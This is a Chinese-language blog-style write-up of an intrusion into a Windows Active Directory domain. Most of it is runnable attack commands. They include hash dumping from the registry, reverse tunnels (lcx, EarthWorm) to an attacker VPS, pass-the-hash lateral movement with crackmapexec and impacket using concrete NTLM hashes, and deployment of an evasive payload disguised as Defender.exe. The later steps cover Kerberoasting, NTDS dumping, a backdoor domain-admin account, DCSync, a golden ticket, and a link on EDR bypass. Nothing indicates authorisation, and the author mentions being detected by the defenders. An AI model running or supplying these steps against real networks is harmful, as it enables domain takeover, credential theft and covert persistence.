一次域环境下的渗透

一次域环境下的渗透
在拿到shell后查看ip信息发现在域环境内（该系统位winserver 2003）

Ipconfig /all
1

查看当前用户发现为system用户，该用户在域环境内对应账户为机器账户，因此该用户可以对域进行查询

查看域内用户

Net user /domain
1

好多老哥已经来过了啊

查看域管账户

net group "domain admins" /domain
1

获取域密码策略

net accounts /domain
1

查看域控的主机名

nslookup -type=SRV _ldap._tcp
1

查看域控制器组

net group "Domain Controllers" /domain
1

查看本地的用户及管理员组，发现PROVINCIA\sipitec在本地的管理员组

net user
net localgroup administrators
1
2

抓取hash，由于是winserver 2003系统，mimikatz并不能使用，于是尝试使用wce获取hash，结果运行不了。。。。说是该程序在内存中过大？？？什么鬼啊

wce.exe -l -v
1

于是使用命令将hash信息导出，然后再使用mimikatz进行获取

reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive
lsadump::sam /sam:sam.hive /system:system.hiv
1
2
3
4

查看域管账户

接下来使用lcx进行端口的映射

失陷主机执行：lcx.exe -slave x.x.x.x 1111 127.0.0.1 3389
VPS执行：lcx -listen 11111 22222
1
2

这时候访问vps的22222端口就可以进行远程登录了，但是不知道为啥这里登录上去后会秒退
于是又尝试了socks代理，由于是win server2003，很多代理工具无法使用，但是earthworm是可以使用的，于是使用ew进行socks代理

失陷主机执行：ew_for_Win.exe -s rssocks -d x.x.x.x -e 1024
VPS执行：./ew_for_linux64 -s rcsocks -l 1080 -e 1024
1
2

再次尝试rdp登录，发现还是老问题，这个winserver 2003真的太折磨了，先用proxychain+msf找个其他机器横向过去
ms17_010找到几个2003的系统。。。。

10.10.0.35
10.10.0.81:445
10.10.0.117:445
10.10.0.129:445
1
2
3
4

修改个前人留下的账号密码

远程上去康康，嘿，这个就可以远程上去，什么鬼啊？这个机器还可以出网，直接上马子

使用cs自带的抓取hash的功能，还是没有抓到域账户

于是尝试横向到其他机器，2003真的很烦，很多工具用不了，只能用最传统的办法了，上传了个端口扫描的工具
扫描10.10.0段发现了另外一个jboss机器(10.0.0.24)，系统还是2003，这次使用wce抓取密码，因为cs上线报错了。。。。。

然后居然抓到了一个域成员的账号

wce.exe -l -v
1

于是马上使用crackmapexec看看我在哪些机器有管理员权限

proxychains4 crackmapexec smb 10.10.0.1/24 -d xxx -u xxx -H C89C6D8250C3FE8BE6C89F092F91AA4E:6502142058074708E48FE52826B351C3 --continue-on-success | grep “Pwn” > result.txt
1

使用crackmapexec尝试看看域控是否有常见的漏洞，发现没有。。。

proxychains4 crackmapexec smb 10.10.0.3 -d xxx -u xxx -H C89C6D8250C3FE8BE6C89F092F91AA4E:6502142058074708E48FE52826B351C3 -M zerologon/petitpotam/nopac(不止使用了这个工具还有其他poc)
1

发现10.10.0.74是一台win2012，终于不是win2003，草！，果断wmiexec横向移动，看看进程，发现有傻卵（杀软）

proxychains4 impacket-wmiexec -hashes C89C6D8250C3FE8BE6C89F092F91AA4E:6502142058074708E48FE52826B351C3 xxx/xxx@10.10.0.74 “tasklist"
1

上个免杀的马子康康(其实完全没有必要搞这么麻烦，直接远程上去就好了，这个hash可以破解的)

proxychains4 crackmapexec smb 10.10.0.74 -d xxx -u xxx -H C89C6D8250C3FE8BE6C89F092F91AA4E:6502142058074708E48FE52826B351C3 --put-file /home/parallels/Defender.exe \\Windows\\Temp\\Defender.exe
1

成功上线

proxychains4 impacket-wmiexec -hashes C89C6D8250C3FE8BE6C89F092F91AA4E:6502142058074708E48FE52826B351C3 xxx/xxx@10.10.0.74 "C:\Windows\Temp\Defender.exe"
1

开启了lsass保护，尝试使用nanodump和ppldump（估计是edr hook了minidump相关的函数，等下来研究下）均失败，还是得上远程啊

上去也没用啊草，edr退不了，人麻了，用bloodhound收集一波信息，之前没用是因为之前的机器都是2003的用不了，发现居然能用Kerberoast获取到域管的SPN hash，不知道是不是版本问题，很多内容都看不到

果断使用rubeus获取到hash,使用hashcat尝试离线破解，失败

Rubeus.exe kerberoast /ldapfilter:'admincount=1'
1

麻了，只能用传统的方法了，上传免杀的fscan进行扫描，先扫个b段的ms17010，发现了几个2003，老样子上传wce抓取hash，又抓到个域用户的hash

proxychains4 crackmapexec smb 10.10.1.135 -d . -u hack$ -p 123123 --put-file /home/parallels/wce.exe \\windows\\temp\\wce.exe
1

结果动静太大，被他发现了（人生建议，尽量不要远程），两个账号都用不了了
又回过头去看初始权限的那台机器（2003），居然发现了域管的hash

proxychains4 impacket-wmiexec ./father:123123@10.10.0.9 "C:\windows\temp\wce.exe -l -v > 1.txt && type 1.txt"
1

于是尝试脱域内所有用户hash，发现访问不到域控的445端口？？？，多半是被发现代理了，于是尝试在另外一台机器搭建代理，然后dump，成功拿下

proxychains4 crackmapexec smb 10.10.0.3 -d xxx -u xxx -H 00000000000000000000000000000000:6C1CAE9B625B64E6A912FEBB985B384A --ntds
1

批量刺探一波，看看哪些机器上有edr，今天非绕过抓到hash不可，哟西，5这个机器有edr，用了ssp也不行，倒是有一种方法可以，就是dump出来的内存有200多个g，太离谱了

链接——>https://medium.com/@balqurneh/bypass-crowdstrike-falcon-edr-protection-against-process-dump-like-lsass-exe-3c163e1b8a3e
1

for ip in $(seq 1 255);do proxychains4 impacket-wmiexec -hashes 00000000000000000000000000000000:6C1CAE9B625B64E6A912FEBB985B384A xxx/xxx@10.10.0.$ip "whoami";done
1

加个域管账号进行权限维持
net user adm1nistrator ThisisPassw0rd /add /domain && net group “Domain Admins” adm1nistrator /add /domain

通过dcsync获取指定用户的hash（后面用域管上线了一台机器）

mimikatz "lsadump::dcsync" "/domain:xxx "/user:xxx"
1

创建黄金票据进行权限维持

mimikatz "kerberos::golden /domain:xxx /sid:S-1-5-21-587556175-550635965-2643831430 /krbtgt:xxx /user:administrator /ticket:ntlm.kirbi" "exit"
1

测试了几种免杀方法，还是比较好用的